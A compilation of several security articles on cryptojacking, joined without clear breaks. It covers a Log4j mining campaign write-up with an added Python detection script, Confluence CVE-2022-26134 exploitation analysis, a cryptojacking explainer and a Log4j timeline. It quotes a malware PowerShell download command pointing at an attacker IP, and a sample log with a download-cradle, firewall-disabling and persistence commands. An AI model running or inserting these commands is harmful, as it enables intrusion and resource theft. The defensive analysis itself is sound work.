powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘[http://141.85.161[.]18/nssm.zip’, ‘%USERPROFILE%\nssm.zip’)”
if errorlevel 1 ( echo ERROR: Can’t download tools to make gado_miner service exit /b 1

Detecting the campaign using Darktrace

The key model breaches Darktrace used to identify this campaign include compromise-focussed models for Application Protocol on Uncommon Port, Outgoing Connection to Rare From Server, and Beaconing to Rare Destination, and file-focussed models for Masqueraded File Transfer, Multiple Executable Files and Scripts from Rare Locations, and Compressed Content from Rare External Location. Cryptocurrency mining is detected under the Cryptocurrency Mining Activity models. The models associated with Unusual PowerShell to Rare and New User Agent highlight the anomalous connections on the infected devices following the Log4j callbacks.

Customers with Darktrace’s Autonomous Response technology, Antigena, also had actions to block the incoming files and scripts downloaded and to restrict the infected devices to their normal pattern of life, preventing both the initial malicious file downloads and the ongoing crypto-mining activity.
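The host-side behaviours listed above for mad_micky.bat (firewall disabled, one-minute scheduled task, Run-key persistence, PowerShell download cradle) can also be hunted in process-creation logs. The following is an added example, not code from the original write-up or from Darktrace; the log format, host names, rule names and the three-behaviours-in-ten-minutes threshold are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Host-side behaviours the write-up attributes to mad_micky.bat and the
# follow-on scripts. Rule names and regexes are this example's own.
RULES = {
    "firewall_disabled": re.compile(
        r"netsh(\.exe)?\s+advfirewall\s+set\s+allprofiles\s+state\s+off", re.I),
    # /sc minute with a 1-5 minute repeat, as in both schtasks commands quoted above
    "minute_sched_task": re.compile(
        r"schtasks(\.exe)?\s.*/create\b(?=.*/sc\s+minute\b)(?=.*/mo\s+[1-5]\b)", re.I),
    "run_key_persistence": re.compile(
        r'reg(\.exe)?\s+add\s+"?HK(CU|LM)\\SOFTWARE\\Microsoft\\Windows'
        r"\\CurrentVersion\\Run(Once)?\b", re.I),
    "ps_download_cradle": re.compile(
        r"powershell(\.exe)?\s.*net\.webclient.*download(string|file)", re.I),
    "ps_policy_bypass": re.compile(
        r"powershell(\.exe)?\s.*-(ep|executionpolicy)\s+bypass", re.I),
    "miner_process_kill": re.compile(
        r"taskkill(\.exe)?\s.*/im\s+(xmrig|logback|network02)\.exe", re.I),
}

# Assumed log shape: "<UTC timestamp> host=<name> cmdline=<full command line>"
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+cmdline=(?P<cmd>.*)$")


def parse(line):
    """Return (timestamp, host, command line) or None for unparseable lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
    except ValueError:
        return None
    return ts, m["host"], m["cmd"]


def match_rules(cmd):
    """Names of every rule whose pattern appears in one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmd))


def correlate(lines, window=timedelta(minutes=10), threshold=3):
    """Alert on hosts showing >= threshold distinct behaviours inside one window.

    A single hit (an admin's 5-minute task, a signed deploy script run with
    -ExecutionPolicy Bypass) is common; the combination in a short span is not.
    """
    hits = defaultdict(list)  # host -> [(timestamp, rule name)]
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ts, host, cmd = parsed
        for rule in match_rules(cmd):
            hits[host].append((ts, rule))

    alerts = {}
    for host, events in hits.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans <= `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {rule for _, rule in events[start:end + 1]}
            if len(distinct) >= threshold and len(distinct) > len(alerts.get(host, [])):
                alerts[host] = sorted(distinct)
    return alerts


# Constructed sample: one host replaying the chain, two hosts with benign lookalikes.
SAMPLE_LOG = r"""
2022-01-10T03:14:02Z host=HZN-CS01 cmdline=powershell.exe -ep bypass -nop -c "IEX ((New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1'))"
2022-01-10T03:14:09Z host=HZN-CS01 cmdline=netsh advfirewall set allprofiles state off
2022-01-10T03:14:15Z host=HZN-CS01 cmdline=schtasks /create /F /sc minute /mo 1 /tn BrowserUpdate /tr "powershell -w hidden -c placeholder"
2022-01-10T03:14:21Z host=HZN-CS01 cmdline=reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d placeholder
2022-01-10T09:00:00Z host=BUILD-07 cmdline=schtasks /create /sc minute /mo 5 /tn InventorySync /tr C:\Tools\sync.exe
2022-01-10T09:30:00Z host=BUILD-07 cmdline=powershell.exe -ExecutionPolicy Bypass -File C:\Tools\deploy.ps1
2022-01-10T10:00:00Z host=WS-114 cmdline=netsh advfirewall show allprofiles
""".strip().splitlines()

if __name__ == "__main__":
    for host, behaviours in correlate(SAMPLE_LOG).items():
        print(f"ALERT {host}: {', '.join(behaviours)}")
```

Feed it Sysmon Event ID 1 or Windows 4688 command lines reshaped into the assumed format; the window and threshold are the knobs to tune against your own baseline.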
Appendix

Darktrace model detections

Anomalous Connection / Application Protocol on Uncommon Port
Anomalous Connection / New User Agent to IP Without Hostname
Anomalous Connection / PowerShell to Rare External
Anomalous File / EXE from Rare External location
Anomalous File / Masqueraded File Transfer
Anomalous File / Multiple EXE from Rare External Locations
Anomalous File / Script from Rare External Location
Anomalous File / Zip or Gzip from Rare External Location
Anomalous Server Activity / Outgoing from Server
Compliance / Crypto Currency Mining Activity
Compromise / Agent Beacon (Long Period)
Compromise / Agent Beacon (Medium Period)
Compromise / Agent Beacon (Short Period)
Compromise / Beacon to Young Endpoint
Compromise / Beaconing Activity To External Rare
Compromise / Crypto Currency Mining Activity
Compromise / Sustained TCP Beaconing Activity To Rare Endpoint
Device / New PowerShell User Agent
Device / Suspicious Domain

MITRE ATT&CK techniques observed

IoCs

On May 31, a critical unpatched vulnerability, which affects all supported versions of Confluence Server and Data Center, was reported to Atlassian by Volexity, a security company. Atlassian warned their customers of the critical vulnerability on June 2 and issued a patch a day later. CISA added this vulnerability to their list of Known Exploited Vulnerabilities on June 3. Check Point released a dedicated protection to prevent an attack exploiting this vulnerability and advises customers to patch the affected systems.

The Vulnerability

The vulnerability in Atlassian Confluence Server and Data Center, designated as CVE-2022-26134, may lead to an unauthenticated Object-Graph Navigation Language (OGNL) expression injection attack. A remote, unauthenticated attacker can use this vulnerability to execute arbitrary code on the target server by placing a malicious payload in the URI.

Figure 1: Malicious payload that exploits CVE-2022-26134.
In The Wild Exploitation

Check Point Research (CPR) researchers noticed a large number of exploitation attempts since the vulnerability was published. At first, many of the would-be attackers used scanning methods to identify vulnerable targets. After a few days, the attackers started to use the vulnerability to download malware to the affected systems. Among the exploitation logs, researchers noticed a few malicious payloads that are related to the same campaign and that originated from the same source but targeted different platforms: Linux and Windows. The infection chain depends on the victim’s operating system.

The Linux OS Targeted Attack

The attacker utilized the Atlassian 0-day vulnerability by sending a crafted HTTP request to the victim.

Figure 2: A crafted HTTP request exploiting CVE-2022-26134 with a base64 encoded payload.

The base64 string decodes into another base64 encoded string. Overall, researchers had to decode the string a few times to get the actual payload.

Figure 3: The decoded base64 string.

This script downloads a bash script file called xms from the remote C&C server to the victim’s tmp folder, executes it, and deletes it afterward.

Figure 4: Part of the malicious xms script.

The xms file is a dropper script. It uninstalls running agents from the victim’s machine and adds itself to cron jobs to maintain persistence upon reboot. In addition, a network connectivity test to a[.]oracleservice.top is performed constantly. In an attempt to spread to other machines, the script searches for ssh keys and tries to connect. It then downloads the xms file from the C&C server and executes it. The script downloads an ELF executable file called dbused to the tmp folder from various remote IPs. The dbused file is packed using UPX to avoid static detection. The ELF file is a crypto miner that exhausts the victim machine’s resources:

Figure 5: The dbused process exhausts the system resources.
The Windows OS Targeted Attack

The attacker utilized the Atlassian vulnerability to execute a PowerShell download cradle to initiate a fileless attack from a remote C&C server.

Figure 6: A crafted HTTP request exploiting CVE-2022-26134 using PowerShell commands.

The lol.ps1 script is injected into a PowerShell memory process. The script verifies the processor’s architecture, using WMI to check whether it matches its requirements. It then downloads an executable file called checkit2 to the tmp folder and runs it in hidden mode.

Figure 7: The lol.ps1 script.

The checkit2.exe process spawns a child process, called InstallUtil.exe, which connects to the C&C server. InstallUtil.exe in turn spawns another child process, AddInProcess.exe, which is the crypto miner. After a few moments of running on the victim’s machine, the checkit2 process terminates itself.

Figure 8: The checkit2.exe process running on the system.

Figure 9: The InstallUtil.exe process running on the system.

The malware downloads a new copy of itself, with a new name, to the Start Menu folder.

Figure 10: The cloud.exe file downloaded to the Startup folder.

The crypto miner now runs on the machine and exhausts all the system’s resources:

Figure 11: Crypto wallet information.

Attack chain

Both attack scenarios start with an initial crafted HTTP request exploiting the CVE-2022-26134 vulnerability. The attacker executes commands using the Java execution function to download a malicious payload to the victim’s machine. The malicious payload then downloads an executable file according to the affected OS. Both executables run a crypto miner to utilize the victim’s resources for their own benefit.

Threat Actors

The a[.]oracleservice.top domain and the crypto wallet we extracted from the system are related to a cybercriminal group called the “8220 gang”.
Check Point Protections:

IPS: Atlassian Confluence Remote Code Execution (CVE-2022-26134)
Anti-Bot: Trojan.WIN32.XMRig

Cryptojacking explained: How to prevent, detect, and recover from it

Criminals are using ransomware-like tactics and poisoned websites to get your employees’ computers to mine cryptocurrencies. Here’s what you can do to stop it.

Cryptojacking definition

Cryptojacking is the unauthorized use of someone else’s compute resources to mine cryptocurrency. Hackers seek to hijack any kind of systems they can take over—desktops, servers, cloud infrastructure and more—to illicitly mine for crypto coins. Regardless of the delivery mechanism, cryptojacking code typically works quietly in the background as unsuspecting victims use their systems normally. The only signs they might notice are slower performance, lags in execution, overheating, excessive power consumption, or abnormally high cloud computing bills.

How cryptojacking works

Coin mining is a legitimate process in the cryptocurrency world that releases new cryptocurrency into circulation. The process works by rewarding currency to the first miner who solves a complex computational problem. That problem completes blocks of verified transactions that are added to the cryptocurrency blockchain. “Miners are essentially getting paid for their work as auditors. They are doing the work of verifying the legitimacy of Bitcoin transactions,” detailed a recent Investopedia explainer on how Bitcoin mining works.
“In addition to lining the pockets of miners and supporting the Bitcoin ecosystem, mining serves another vital purpose: It is the only way to release new cryptocurrency into circulation.”

Earning cryptocurrency via coin mining typically takes a huge amount of processing power and energy to carry off. Additionally, the cryptocurrency ecosystem is designed in a way that makes mining harder and reduces the rewards for it over time and with more mining competition. This makes legitimate cryptocurrency coin mining an extremely costly affair, with expenses rising all the time. Cybercriminals slash mining overhead by simply stealing compute and energy resources. They use a range of hacking techniques to gain access to systems that will do the computational work illicitly and then have these hijacked systems send the results to a server controlled by the hacker.

Cryptojacking attack methods

The attack methods are limited only by the cryptojackers’ creativity, but the following are some of the most common ones used today.

Endpoint attacks

In the past, cryptojacking was primarily an endpoint malware play, existing as yet another moneymaking objective for dropping malware on desktops and laptops. Traditional cryptojacking malware is delivered via typical routes like fileless malware, phishing schemes, and embedded malicious scripts on websites and in web apps. The most basic way cryptojacking attackers can steal resources is by sending endpoint users a legitimate-looking email that encourages them to click on a link that runs code to place a cryptomining script on their computer. It runs in the background and sends results back via a command and control (C2) infrastructure. Another method is to inject a script on a website or an ad that is delivered to multiple websites. Once victims visit the website or the infected ad pops up in their browsers, the script automatically executes. No code is stored on the victims’ computers.
These avenues still remain a legitimate concern, though criminals have added significantly more sophisticated techniques to their cryptojacking playbooks as they seek to scale up profits, with some of these evolving methods described below.

Scan for vulnerable servers and network devices

Attackers seek to amp up the profitability of cryptojacking by expanding their horizons to servers, network devices, and even IoT devices. Servers, for example, are a particularly juicy target since they are usually higher powered than a run-of-the-mill desktop. They’re also a prime hunting ground in 2022 as the bad guys scan for servers exposed to the public internet that contain vulnerabilities such as Log4J, exploiting the flaw and quietly loading cryptomining software on the system that’s connected to the hacker’s servers. Often attackers will use the initially compromised system to move their cryptojacking laterally into other network devices. “We’re seeing an uptick in cryptomining stemming from the Log4J vulnerability,” says Sally Vincent, senior threat research engineer for LogRhythm. “Hackers are breaking into networks and installing malware that uses storage to mine cryptos.”

Software supply chain attacks

Cybercriminals are targeting the software supply chain by seeding open-source code repositories with malicious packages and libraries that contain cryptojacking scripts embedded within their code. With developers downloading these packages by the millions around the globe, these attacks can rapidly scale up cryptojacking infrastructure for the bad guys in two ways. The malicious packages can be used to target developer systems—and the networks and cloud resources they connect to—to use them directly as illicit cryptomining resources. Or they can leverage these attacks to poison the software that these developers are building with components that execute cryptomining scripts on the machines of an application’s end user.
Leveraging cloud infrastructure

Many cryptojacking enterprises are taking advantage of the scalability of cloud resources by breaking into cloud infrastructure and tapping into an even broader collection of compute pools to power their mining activity. A study last fall by Google’s Cybersecurity Action Team reported that 86% of compromised cloud instances are used for cryptomining. “Today, attackers are targeting cloud services by any means to mine more and more cryptocurrency, as cloud services can allow them to run their calculations on a larger scale than just a single local machine, whether they’re taking over a user’s managed cloud environment or even abusing SaaS applications to execute their calculations,” Guy Arazi, senior security researcher for Palo Alto Networks, wrote in a blog post.

One of the common methods to do this is by scanning for exposed container APIs or unsecured cloud storage buckets and using that access to start loading coin-mining software on impacted container instances or cloud servers. The attack is typically automated with scanning software that looks for servers accessible to the public internet with exposed APIs or unauthenticated access possible. Attackers generally use scripts to drop the miner payloads onto the initial system and to look for ways to propagate across connected cloud systems. “The profitability and ease of conducting cryptojacking at scale makes this type of attack low-hanging fruit,” said Matt Muir, security researcher for Cado Security, in a blog post explaining that cloud-based attacks are particularly lucrative. “This will likely continue for as long as users continue to expose services such as Docker and Redis to untrusted networks.”

Why cryptojacking is popular

According to a report by ReasonLabs, in the last year 58.4% of all Trojans detected were cryptojacking coin miners.
Meantime, another study by SonicWall found that 2021 was the worst year to date for cryptojacking attacks, with the category logging 97.1 million attacks over the course of the year. These numbers are so strong because cryptojacking is virtually minting money for cybercriminals. When a crook can mine for cryptocurrency on a seemingly limitless pool of free compute resources from victim machines, the upside for them is huge. Even with the precipitous drop in Bitcoin valuation this spring that brought it below the $30,000 level, cryptojackers’ illicit margins still make business sense as the value of what they mine far outstrips the costs of their criminal infrastructure.

Real-world cryptojacking examples

WatchDog targets Docker Engine API endpoints and Redis servers

A honeypot from the security research team at Cado Labs discovered a multi-stage cryptojacking attack that targets exposed Docker Engine API endpoints and Redis servers, and can propagate in a worm-like fashion. The attack is perpetrated by the WatchDog attack group, which has been particularly active in late 2021 and 2022 with numerous cryptojacking campaigns.

Alibaba ECS instances in cryptomining crosshairs

TeamTNT was one of the first hacking groups to shift cryptojacking focus heavily to cloud-oriented services. Researchers with TrendMicro in late 2021 reported that this group, along with rivals like the Kinsing gang, were conducting cryptojacking campaigns that installed miners in Alibaba Elastic Computing Service (ECS) instances and disabled security features to evade detection.

Miner bots and backdoors use Log4J to attack VMware Horizon servers

The Log4Shell vulnerability has been a boon to cryptojacking attackers in 2022.
In one marked example, Sophos researchers found earlier this year that a ‘horde’ of attackers were targeting VMware Horizon servers to deliver a range of cryptojacking payloads that included the z0Miner, the JavaX miner and at least two XMRig variants, Jin and Mimu cryptocurrency miner bots.

Supply chain attacks via npm libraries

The software supply chain security experts at Sonatype in fall of 2021 sounded the alarm on malicious cryptomining packages hiding in npm, the JavaScript package repository used by developers worldwide. At the time it found a trio of packages, at least one of which was impersonating a popular, legitimate library used by developers called “ua-parser-js,” which gets over 7 million weekly downloads and would be an ideal way to lure in developers to accidentally download a malicious bit of code and install it in their software. A few months after that report, researchers at WhiteSource (now Mend) released an additional report that showed npm is swarming with malicious code—as many as 1,300 malicious packages that include cryptojacking and other nefarious behavior.

Romanian attackers target Linux machines with cryptomining malware

Last summer Bitdefender discovered a Romanian threat group that was targeting Linux-based machines with SSH credentials to deploy Monero mining malware. The tools they used were distributed on an as-a-service model. This example was on the spear tip of what appears to be a growing trend of Linux system cryptomining attacks. A report earlier this year from VMware detailed a growing targeting of Linux-based multi-cloud environments, particularly using the XMRig mining software. “Many of the cryptomining samples from Linux-based systems have some relationship to the XMRig application,” explained the report, which showed that 89% of cryptomining attacks used XMRig-related libraries. “Therefore, when XMRig-specific libraries and modules in Linux binaries are identified, it is likely evidence of potential cryptomining behavior.”
CoinStomp uses sophisticated evasion tactics

CoinStomp is another cryptojacking campaign recently discovered to be targeting Asian cloud service providers (CSPs). This one distinguished itself by its anti-forensics and evasion measures. These included timestomping to manipulate system timestamps, removal of system cryptographic policies, and the use of the /dev/tcp device file to create a reverse shell session, explained Cado’s Muir in a report on the attack.

Cryptocurrency farm found in warehouse

Cryptojackers can sometimes go to great lengths to steal not only processing power but also energy and network resources from corporate infrastructure. Last year Darktrace analysts highlighted an anonymous example from one of its clients where it discovered a cryptomining farm in a warehouse that was disguised inside an unassuming set of cardboard boxes. Inside was a stealthy rig running multiple GPUs that were hooked into the company’s network power,

How to prevent cryptojacking

As it has evolved into a multi-vector attack that spans across endpoint, server, and cloud resources, preventing cryptojacking takes an orchestrated and well-rounded defense strategy. The following steps can help prevent cryptojacking from running rampant on enterprise resources.

Employ strong endpoint protection: The foundation of that is using endpoint protection and anti-malware that’s capable of detecting cryptominers, as well as keeping web filters up to date and managing browser extensions to minimize the risk of browser-based scripts executing. Organizations should ideally look for endpoint protection platforms that can extend out to servers and beyond.

Patch and harden servers (and everything else). Cryptojackers tend to look for the lowest hanging fruit that they can quietly harvest—that includes scanning for publicly exposed servers containing older vulnerabilities.
Basic server hardening that includes patching, turning off unused services, and limiting external footprints can go a long way toward minimizing the risk of server-based attacks.

Use software composition analysis. Software composition analysis (SCA) tools provide better visibility into what components are being used within software to prevent supply chain attacks that leverage coin mining scripts.

Hunt down cloud misconfigurations. One of the most impactful ways organizations can stop cryptojacking in the cloud is by tightening cloud and container configurations. That means finding cloud services exposed to the public internet without proper authentication, rooting out exposed API servers, and eliminating credentials and other secrets stored in developer environments and hardcoded into applications.

How to detect cryptojacking

Cryptojacking is a classic low-and-slow cyberattack designed to leave minimal signs behind to avoid long-term detection. While endpoint protection platforms and endpoint detection and response technologies have come a long way in alerting to cryptojacking attacks, the bad guys are masters of evasion on this front and detecting illicit coin miners can still prove difficult, especially when only a few systems are compromised. The following are some additional methods for flagging signs of cryptojacking.

Train your help desk to look for signs of cryptomining. Sometimes the first indication on user endpoints is a spike in help desk complaints about slow computer performance. That should raise a red flag to investigate further, as could devices over-heating or poor battery performance in mobile devices.

Deploy a network monitoring solution. Network monitoring tools can offer a powerful tool in picking up on the kinds of web traffic and outbound C2 traffic that indicate cryptojacking activity, no matter the device it is coming from.
“If you have good egress filtering on a server where you’re watching for outbound connection initiation, that can be good detection for [cryptomining malware],” says Travis Farral, vice president and CISO at Archaea Energy. He warns, though, that cryptominer authors can write their malware to avoid that detection method.

Use cloud monitoring and container runtime security. Evolving tools like cloud monitoring and container runtime security scanning can offer additional visibility into cloud environments that may be impacted by unauthorized cryptominers. Cloud providers are baking in this kind of visibility into their service, sometimes as add-ons. For instance, Google Cloud expanded its Security Command Center earlier this year to include what it calls its Virtual Machine Threat Detection (VMTD) to pick up on signs of cryptomining in the cloud, among other cloud threats.

Engage in regular threat hunts. Since so many cryptojacking attacks are stealthy and leave few tracks, organizations may need to take more active measures like threat hunting to regularly seek out subtle signs of compromise and follow through with investigations.

“Endpoint security and SOC teams should invest time into active exercises and threat hunts instead of waiting around for something potentially catastrophic to happen,” LogRhythm’s Vincent says.

Monitor your websites for cryptomining code. Farral warns that cryptojackers are finding ways to place bits of JavaScript code on web servers. “The server itself isn’t the target, but anyone visiting the website itself [risks infection],” he says. He recommends regularly monitoring for file changes on the web server or changes to the pages themselves.

How to respond to a cryptojacking attack

After illicit cryptomining activity has been detected, responding to a cryptojacking attack should follow standard cyber incident response steps that include containment, eradication, recovery, and lessons learned.
Some tips for how to respond to a cryptojacking attack include:

Kill web-delivered scripts. For in-browser JavaScript attacks, the solution is simple once cryptomining is detected: Kill the browser tab running the script. IT should note the website URL that’s the source of the script and update the company’s web filters to block it.

Shut down compromised container instances. Immutable cloud infrastructure like container instances that are compromised with coin miners can also be handled simply, by shutting down infected container instances and starting fresh. However, organizations must dig into the root causes that led to the container compromise in the first place. This means looking for signs that the container dashboard and credentials have been compromised and examining connected cloud resources for signs of compromise. A key step is ensuring that the fresh new container image to replace the old one isn’t similarly configured.

Reduce permissions and regenerate API keys. Eradicating and fully recovering from cloud-based cryptojacking will require organizations to reduce permissions to impacted cloud resources (and those connected to them) and regenerate API keys to prevent attackers from walking right back into the same cloud environment.

Learn and adapt. Use the experience to better understand how the attacker was able to compromise your systems. Update your user, helpdesk, IT, and SOC analyst training so they are better able to identify cryptojacking attempts and respond accordingly.

Editor’s note: This article, originally published in February 2018, has been updated to include new research, best practices, and cryptojacking examples.

The Apache Log4j vulnerabilities: A timeline

The Apache Log4j vulnerability has impacted organizations around the globe. Here is a timeline of the key events surrounding the Log4j exploit as they have unfolded.

The Apache Log4j vulnerability has made global headlines since it was discovered in early December.
The flaw has impacted vast numbers of organizations around the world as security teams have scrambled to mitigate the associated risks. Here is a timeline of the key events surrounding the Log4j vulnerability as they have unfolded.

Thursday, December 9: Apache Log4j zero-day exploit discovered

Apache released details on a critical vulnerability in Log4j, a logging library used in millions of Java-based applications. Attackers began exploiting the flaw (CVE-2021-44228) – dubbed “Log4Shell”, which was rated 10 out of 10 on the CVSS vulnerability rating scale. It could lead to remote code execution (RCE) on underlying servers that run vulnerable applications. “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled,” Apache developers wrote in an advisory. A fix for the issue was made available with the release of Log4j 2.15.0 as security teams from around the globe worked to protect their organizations. Businesses were urged to install the latest version.

Friday, December 10: UK NCSC issues Log4j warning to UK organizations

As the fallout from the vulnerability continued, the UK’s National Cyber Security Centre (NCSC) issued a public warning to UK companies about the flaw and outlined strategies for mitigation. The NCSC advised all organizations to install the latest update immediately wherever Log4j was known to be used. “This should be the first priority for all UK organizations using software that is known to include Log4j. Organizations should update both internet-facing and non-internet facing software,” the statement read. Businesses were also urged to seek out unknown instances of Log4j and deploy protective network monitoring/blocking.

Saturday, December 11: CISA director comments on “urgent challenge to network defenders”

Much like the UK’s NCSC, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) publicly responded to the Log4j vulnerability with director Jen Easterly reflecting upon the urgent challenge it presented to network defenders. “CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the Log4j software library,” she said in a statement. “We are taking urgent action to drive mitigation of this vulnerability and detect any associated threat activity. We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies – and signals to non-federal partners – to urgently patch or remediate this vulnerability. We are proactively reaching out to entities whose networks may be vulnerable and are leveraging our scanning and intrusion detection tools to help government and industry partners identify exposure to or exploitation of the vulnerability.”

CISA recommended that asset owners take three additional, immediate steps to help mitigate the vulnerability:

  • Enumerate any external facing devices that have Log4j installed
  • Ensure security operations centers are actioning every single alert on the devices that fall into the category above
  • Install a web application firewall with rules that automatically update so that security operations centers (SOCs) can concentrate on fewer alerts

Tuesday, December 14: Second Log4j vulnerability carrying denial-of-service threat detected, new patch released

A second vulnerability impacting Apache Log4j was discovered. The new exploit, CVE-2021-45046, allowed malicious actors to craft malicious input data using a JNDI lookup pattern to create denial-of-service (DoS) attacks, according to the CVE description.
A new patch for the exploit was made available which removed support for message lookup patterns and disabled JNDI functionality by default, with the Log4j 2.15.0 fix for the original flaw incomplete in certain non-default configurations.

“While CVE-2021-45046 is less severe than the original vulnerability, it becomes another vector for threat actors to conduct malicious attacks against unpatched or improperly patched systems,” Amy Chang, head of risk and response at Resilience, told CSO shortly after the flaw was discovered. “The incomplete patch to CVE-2021-44228 could be abused to craft malicious input data, which could result in a DoS attack. A DoS attack can shut down a machine or network and render it inaccessible to its intended users,” she added. Organizations were advised to update to Log4j 2.16.0 as soon as possible.

Friday, December 17: Third Log4j vulnerability revealed, new fix made available

Apache published details of a third major Log4j vulnerability and made yet another fix available. This was an infinite recursion flaw rated 7.5 out of 10. “The Log4j team has been made aware of a security vulnerability, CVE-2021-45105, that has been addressed in Log4j 2.17.0 for Java 8 and up,” it wrote. “Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process.
This is also known as a DoS (denial-of-service) attack.”

Apache also outlined the following mitigations:

  • In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC)
  • Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input

Monday, December 20: Log4j exploited to install Dridex and Meterpreter

Cybersecurity research group Cryptolaemus warned that the Log4j vulnerability was being exploited to infect Windows devices with the Dridex banking Trojan and Linux devices with Meterpreter. Dridex is a form of malware that steals bank credentials via a system that uses macros from Microsoft Word, while Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore a target machine and execute code. Cryptolaemus member Joseph Roosen told BleepingComputer that threat actors use the Log4j RMI (Remote Method Invocation) exploit variant to force vulnerable devices to load and execute a Java class from an attacker-controlled remote server.

Wednesday, December 22: Data shows 10% of all assets vulnerable to Log4Shell

Data released by cybersecurity vendor Tenable revealed that one in 10 of all assets were vulnerable to Log4Shell, while 30% of organizations had not begun scanning for the bug. “Of the assets that have been assessed, Log4Shell has been found in approximately 10% of them, including a wide range of servers, web applications, containers and IoT devices,” read a Tenable blog posting. “Log4Shell is pervasive across all industries and geographies. One in 10 corporate servers being exposed. One in 10 web applications and so on.
One in 10 of nearly every aspect of our digital infrastructure has the potential for malicious exploitation via Log4Shell.”

The vendor warned that Log4Shell carries a greater potential threat than EternalBlue (exploited in the WannaCry attacks) because of the pervasiveness of Log4j across both infrastructure and applications. “No single vulnerability in history has so blatantly called out for remediation. Log4Shell will define computing as we know it, separating those that put in the effort to protect themselves and those comfortable being negligent,” it added.

Tuesday, January 4: FTC tells companies to patch Log4j vulnerability, threatens legal action

The Federal Trade Commission (FTC) urged U.S. organizations to patch the Log4Shell vulnerability immediately or risk facing punitive action from the agency. “When vulnerabilities are discovered and exploited, it risks a loss or breach of personal information, financial loss, and other irreversible harms. The duty to take reasonable steps to mitigate known software vulnerabilities implicates laws including, among others, the Federal Trade Commission Act and the Gramm Leach Bliley Act,” the FTC said. It added that it is critical that companies and their vendors relying on Log4j act now to reduce the likelihood of harm to consumers and to avoid FTC legal action. “The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.”

Monday, January 10: Microsoft warns of China-based ransomware operator exploiting Log4Shell

Microsoft updated its Log4j vulnerability guidance page with details of a China-based ransomware operator (DEV-0401) targeting internet-facing systems and deploying the NightSky ransomware. “As early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon,” it wrote.
“DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).” Based on Microsoft’s analysis, attackers were discovered to be using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.

Security 101: The Impact of Cryptocurrency-Mining Malware

The Australian government has just recognized digital currency as a legal payment method. Since July 1, purchases done using digital currencies such as bitcoin are exempt from the country’s Goods and Services Tax to avoid double taxation. As such, traders and investors will not be levied taxes for buying and selling them through legal exchange platforms.

Japan, which legitimized bitcoin as a form of payment last April, already expects more than 20,000 merchants to accept bitcoin payments. Other countries are joining the bandwagon, albeit partially: businesses and some of the public organizations in Switzerland, Norway, and the Netherlands. In a recent study, unique, active users of cryptocurrency wallets are pegged between 2.9 and 5.8 million, most of which are in North America and Europe.

But what does the acceptance and adoption of digital currencies have to do with online threats? A lot, actually. As cryptocurrencies like bitcoin gain real-world traction, so will cybercriminal threats that abuse it. But how, exactly? What does this mean to businesses and everyday users?

What is cryptocurrency?

Cryptocurrency is an encrypted data string that denotes a unit of currency.
It is monitored and organized by a peer-to-peer network also known as a blockchain, which also serves as a secure ledger of transactions, e.g., buying, selling, and transferring. Unlike physical money, cryptocurrencies are decentralized, which means they are not issued by governments or other financial institutions.

Cryptocurrencies are created (and secured) through cryptographic algorithms that are maintained and confirmed in a process called mining, where a network of computers or specialized hardware such as application-specific integrated circuits (ASICs) process and validate the transactions. The process incentivizes the miners who run the network with the cryptocurrency.

Bitcoin isn’t the be-all and end-all

There are actually over 700 cryptocurrencies, but only some are readily traded and even fewer have market capitalization above $100 million. Bitcoin, for instance, was created by Satoshi Nakamoto (pseudonym) and released in 2009 as open-source code. Blockchain technology made it all work, providing a system where data structures (blocks) are broadcasted, validated, and registered in a public, distributed database through a network of communication endpoints (nodes).

While bitcoin is the most famous cryptocurrency, there are other popular alternatives. Ethereum took “smart contracts” up a notch by making the programming languages needed to code them more accessible to developers. Agreements, or conditional/if-then transactions, are written as code and executed (as long as requirements are met) in Ethereum’s blockchain.

Ethereum, however, earned notoriety after a hacker exploited a vulnerability in the Digital Autonomous Organization (DAO) running on Ethereum’s software, siphoning US $50 million worth of ether (Ethereum’s currency). This resulted in the development of Ethereum Classic, based on the original blockchain, and Ethereum, its upgraded version (via a hard fork).

There are also other notable cryptocurrencies: Litecoin, Dogecoin, Monero.
